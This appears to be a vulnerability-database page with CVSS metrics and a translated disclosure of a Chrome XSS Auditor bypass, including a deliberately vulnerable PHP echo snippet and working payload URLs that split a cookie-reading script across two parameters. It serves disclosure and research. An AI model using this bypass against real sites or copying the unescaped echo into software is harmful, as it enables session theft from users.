The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
High
PR
The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable system allowing full access to the vulnerable system’s settings and files.
Scope
S
An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality
Low
C
There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity
None
I
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Sumary
----------
A security flaw allows an attacker to execute XSS attacks evading the native filter AntiXSS.
Details
---------
A few days ago I found a way to circumvent the security system of the current latest version of Google Chrome that prevents XSS attack and I have left a temporary proof of concept here:
http://ec2-50-16-152-72.compute-1.amazonaws.com/chrome-filterxss-bypass.php
test.php
<p> var1: <?php echo $ _GET ['var1'];?> </ p>
<p> var2: <?php echo $ _GET ['var2'];?> </ p>
Filter Works: test.php?var1=<script>alert(document.cookie);/*&var2=*/</ script>
Filter Bypass: test.php?var1=<script>alert(document.cookie);x='&var2=';</ script>
The problem is that Chrome does not remove everything that is in front of <script> allowing an attacker manage to obfuscate the code after the code is injected.
http://trac.webkit.org/browser/trunk/Source/WebCore/html/parser/XSSAuditor.cpp?rev=119184#L91
Only filter comments in script tag.
To understand a little more of this we must first know that Google has provided a filter that prevents an attacker aprobecharse your browser, but ... How real is it in practice?
Taking a look on the internet ( https://www.google.cl/search?q=bypass%20chrome%20xss%20filter) I realized that over time there have been many ways to circumvent this security system and today is no exception, but end user then it really serves this added security system, the answer is NO and Microsoft knows very well also because since the release of Internet Explorer 8 have tried to create similar filters to prevent such attacks without positive results and that each security conference to be held somewhere in the world there is always someone who shows up with his new bypass your filter.
But ... What is XSS? ...
A technically XSS attack is when a web site prints everything that you send may inject malicious code can eg steal user sessions, etc. But even though this is purely because of a bad development WEB some companies opt for trying prevent such situations directly through their products (browsers).
Was it reported?
I did report waiting to give me something to google bounty program ( http://www.chromium.org/Home/chromium-security/vulnerability-rewards-program ) but was told that was not covered xD indeed said they had some things that if filtered and some not:
https://code.google.com/p/chromium/issues/detail?id=171114
> # 1 jsc ... @ chromium.org
>
> That is correct. The XSS auditor does not filter script Explicitly
injection split across multiple variables. At some point we plan on
posting a document explaining what the XSS auditor can and can not filter.
Is it 100% effective?
The answer is too light and is a resounding NO, is like the case of a virus, the same manufacturers say they can not ensure that detect more than 30% of all existing viruses, in the case of the filters you can ensure neither antixss nobody ever you can hack through an XSS filter is actually the factory and can not or do not want to delete, and will have to use it.
What are the risks of using anti XSS filters?
Some companies like Microsoft have had huge problems by imposing these filters to users because some attackers manage to make such a filter is placed against the same users can steal accounts websites have never had problems security such as universal XSS case of Internet Explorer ( http://blackhat.com/html/bh-eu-10/bh-eu-10-briefings.html#Lindsay ). In other issues of standards and programming since in some cases they send some pages to a section where you send HTML content parameters and filters antixss the interrupt, which goes against the standard HTTP protocol because that's what URL encodings and proper web programming.
Mozilla is very clear
Today Mozilla Firefox does not use any filter antiXSS, why?, Because they have clear, use an anti xss only attracts more hackers and hackers to try to break those rules and effortlessly possible, try to impose filters is like trying to cover the sun with one finger, XSS flaws are not the fault of the explorers but developers of websites, for otherwise we often want to test or teach people about how to take care of codes such situations but it is only possible from mozilla firefox and others that do not include such a filter.
From Mozilla Firefox recommend using NoScript addon ( https://wiki.mozilla.org/Security/Features/XSS_Filter ) for people who really want a filter and not imposed. As always worrying about what we want and not of what we consume.
(powered by Google Translator).
Mirror
--------
http://whk.drawcoders.net/index.php/topic,2889.0.html
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum